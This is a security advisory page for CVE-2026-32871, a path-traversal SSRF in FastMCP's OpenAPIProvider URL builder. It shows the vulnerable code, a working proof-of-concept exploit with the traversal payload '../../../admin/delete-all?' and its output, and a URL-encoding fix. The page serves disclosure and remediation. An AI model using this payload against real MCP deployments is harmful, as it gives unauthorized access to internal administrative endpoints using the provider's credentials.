Python
CVE-2026-32871
CRITICAL
Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from Vendor (https://github.com/PrefectHQ/fastmcp).
CVSS VectorVendor: https://github.com/PrefectHQ/fastmcp
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
3Blast Radius
ecosystem impact- 23 pypi packages depend on fastmcp (22 direct, 1 indirect)
Ecosystem-wide dependent count for version 3.2.0.
DescriptionCVE.org
Technical Description
The OpenAPIProvider in FastMCP exposes internal APIs to MCP clients by parsing OpenAPI specifications. The RequestDirector class is responsible for constructing HTTP requests to the backend service.
A critical vulnerability exists in the _build_url() method. When an OpenAPI operation defines path parameters (e.g., /api/v1/users/{user_id}), the system directly substitutes parameter values into the URL template string without URL-encoding. Subsequently, urllib.parse.urljoin() resolves the final URL.
Since urljoin() interprets ../ sequences as directory traversal, an attacker controlling a path parameter can perform path traversal attacks to escape the intended API prefix and access arbitrary backend endpoints. This results in authenticated SSRF, as requests are sent with the authorization headers configured in the MCP provider.
---
Vulnerable Code
File: fastmcp/utilities/openapi/director.py
def _build_url(
self, path_template: str, path_params: dict[str, Any], base_url: str
) -> str:
# Direct string substitution without encoding
url_path = path_template
for param_name, param_value in path_params.items():
placeholder = f"{{{param_name}}}"
if placeholder in url_path:
url_path = url_path.replace(placeholder, str(param_value))
# urljoin resolves ../ escape sequences
return urljoin(base_url.rstrip("/") + "/", url_path.lstrip("/"))Root Cause
- Path parameters are substituted directly without URL encoding
urllib.parse.urljoin()interprets../as directory traversal- No validation prevents traversal sequences in parameter values
- Requests inherit the authentication context of the MCP provider
---
Proof of Concept
Step 1: Backend API Setup
Create internal_api.py to simulate a vulnerable backend server:
from fastapi import FastAPI, Header, HTTPException
import uvicorn
app = FastAPI()
@app.get("/api/v1/users/{user_id}/profile")
def get_profile(user_id: str):
return {"status": "success", "user": user_id}
@app.get("/admin/delete-all")
def admin_endpoint(authorization: str = Header(None)):
if authorization == "Bearer admin_secret":
return {"status": "CRITICAL", "message": "Administrative access granted"}
raise HTTPException(status_code=401)
if __name__ == "__main__":
uvicorn.run(app, host="127.0.0.1", port=8080)Step 2: Exploitation Script
Create exploit_poc.py:
import asyncio
import httpx
from fastmcp.utilities.openapi.director import RequestDirector
async def exploit_ssrf():
# Initialize vulnerable component
director = RequestDirector(spec={})
base_url = "http://127.0.0.1:8080/"
template = "/api/v1/users/{id}/profile"
# Payload: Path traversal to reach /admin/delete-all
# The '?' character neutralizes the rest of the original template
payload = "../../../admin/delete-all?"
# Construct malicious URL
malicious_url = director._build_url(template, {"id": payload}, base_url)
print(f"[*] Generated URL: {malicious_url}")
async with httpx.AsyncClient() as client:
# Request inherits MCP provider's authorization headers
response = await client.get(
malicious_url,
headers={"Authorization": "Bearer admin_secret"}
)
print(f"[+] Status Code: {response.status_code}")
print(f"[+] Response: {response.text}")
if __name__ == "__main__":
asyncio.run(exploit_ssrf())Expected Output
[*] Generated URL: http://127.0.0.1:8080/admin/delete-all?
[+] Status Code: 200
[+] Response: {"status": "CRITICAL", "message": "Administrative access granted"}The attacker successfully accessed an endpoint not defined in the OpenAPI specification using the MCP provider's authentication credentials.
---
Impact Assessment
Severity Justification
- Unauthorized Access: Attackers can interact with private endpoints not exposed in the OpenAPI specification
- Privilege Escalation: The attacker operates within the MCP provider's security context and credentials
- Authentication Bypass: The primary security control of OpenAPIProvider (restricting access to safe functions) is completely circumvented
- Data Exfiltration: Sensitive internal APIs can be accessed and exploited
- Lateral Movement: Internal-only services may be compromised from the network boundary
Attack Scenarios
- Accessing Admin Panels: Bypass API restrictions to reach administrative endpoints
- Data Theft: Access internal databases or sensitive information endpoints
- Service Disruption: Trigger destructive operations on backend services
- Credential Extraction: Access endpoints returning API keys, tokens, or credentials
---
Remediation
Recommended Fix
URL-encode all path parameter values before substitution to ensure reserved characters (/, ., ?, #) are treated as literal data, not path delimiters.
Updated code for _build_url() method:
import urllib.parse
def _build_url(
self, path_template: str, path_params: dict[str, Any], base_url: str
) -> str:
url_path = path_template
for param_name, param_value in path_params.items():
placeholder = f"{{{param_name}}}"
if placeholder in url_path:
# Apply safe URL encoding to prevent traversal attacks
# safe="" ensures ALL special characters are encoded
safe_value = urllib.parse.quote(str(param_value), safe="")
url_path = url_path.replace(placeholder, safe_value)
return urljoin(base_url.rstrip("/") + "/", url_path.lstrip("/"))AnalysisAI
Server-Side Request Forgery (SSRF) in FastMCP's OpenAPIProvider allows authenticated attackers to access arbitrary backend endpoints through path traversal injection in OpenAPI path parameters. The vulnerability arises from improper URL encoding in the RequestDirector._build_url() method, enabling attackers to escape intended API prefixes using '../' sequences and reach internal administrative or sensitive endpoints while inheriting the MCP provider's authentication context. This affects the fastmcp Python package and enables privilege escalation beyond the OpenAPI specification's intended API surface. No public exploit identified at time of analysis, though detailed proof-of-concept code exists in the GitHub advisory demonstrating traversal to /admin endpoints.
Technical ContextAI
FastMCP is a Python framework for building Model Context Protocol (MCP) servers. The OpenAPIProvider component exposes backend APIs to MCP clients by parsing OpenAPI specifications. The vulnerability occurs in the RequestDirector class's _build_url() method (fastmcp/utilities/openapi/director.py), which performs direct string substitution of path parameters into URL templates without URL-encoding special characters. When urllib.parse.urljoin() subsequently resolves the constructed URL, it interprets '../' sequences as legitimate directory traversal operators. This is a classic instance of CWE-918 (Server-Side Request Forgery) compounded by improper input validation (CWE-20). The root cause is treating user-controlled path parameter values as trusted URL components rather than opaque data requiring encoding. The affected package is distributed via PyPI as 'fastmcp', and the CPE identifier pkg:pip/fastmcp indicates all versions prior to the patch are vulnerable.
RemediationAI
Apply URL encoding to all path parameter values before substitution into URL templates by implementing urllib.parse.quote() with safe='' parameter in the RequestDirector._build_url() method. The GitHub advisory at https://github.com/PrefectHQ/fastmcp/security/advisories/GHSA-vv7q-7jx5-f767 provides the complete patched code implementation. Upgrade to the patched version of fastmcp immediately if available through PyPI (specific fixed version number not provided in available data, consult the GitHub advisory for release details). As an interim workaround, implement input validation to reject path parameter values containing '../', './', or URL-encoded equivalents (%2e%2e%2f, etc.), though this defense-in-depth measure is inferior to proper URL encoding. Review OpenAPI specifications to minimize use of path parameters for sensitive operations, preferring query parameters or request body data where feasible. Audit backend services for unintended exposure of administrative or internal endpoints, implementing additional authentication layers for high-privilege operations independent of the MCP provider's credentials. Monitor for anomalous URL patterns in backend access logs indicating traversal attempts.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same weakness CWE-918 – Server-Side Request Forgery (SSRF)
View allVendor StatusVendor
Share
External POC / Exploit Code
Leaving vuln.today
GHSA-vv7q-7jx5-f767